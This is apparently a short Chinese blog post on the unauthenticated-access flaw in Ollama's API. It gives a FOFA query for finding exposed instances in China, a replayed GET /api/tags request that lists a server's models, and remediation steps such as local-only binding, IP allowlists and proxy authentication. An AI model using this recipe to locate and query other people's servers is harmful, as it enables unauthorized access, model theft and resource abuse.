一、漏洞描述

        Ollama 是一个开源的大型语言模型(LLM)运行环境和工具集,旨在帮助开发者轻松部署、管理和使用模型(例如 DeepSeek 等)。Ollama 存在未授权访问漏洞,该漏洞是由于 Ollama 默认未设置身份验证和访问控制功能,允许未授权的攻击者在远程条件下调用 Ollama 服务接口并执行恶意操作,包括但不限于敏感模型资产窃取、虚假信息输入、模型计算资源滥用和拒绝服务、系统配置篡改和扩展利用。

        二、影响范围

        全版本(未设置访问认证的情况下)

        三、FOFA-Search...

app="Ollama"  && is_domain=false && country="CN"

        四、访问并抓包

        五、发送到重放器构造

#构造 --- 只留下面的6个字段,注意有两空行
GET /api/tags HTTP/1.1
Host: *******抓到的
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

六、修复建议

  1. 若Ollama只提供本地服务,设置环境变量Environment="OLLAMA_HOST=127.0.0.1",仅允许本地访问
  2. 若Ollama需提供公网服务,选择以下方法添加认证机制:

1)修改config.yaml、settings.json 配置文件,限定可访问Ollama 服务的IP地址;

2)通过防火墙等设备配置IP白名单,阻止非授权IP的访问请求;

3)通过反向代理进行身份验证和授权(如使用OAuth2.0协议),防止未经授权用户访问。

                                                                                                                                   FROM  IYU_

Logo

欢迎加入DeepSeek 技术社区。在这里,你可以找到志同道合的朋友,共同探索AI技术的奥秘。

更多推荐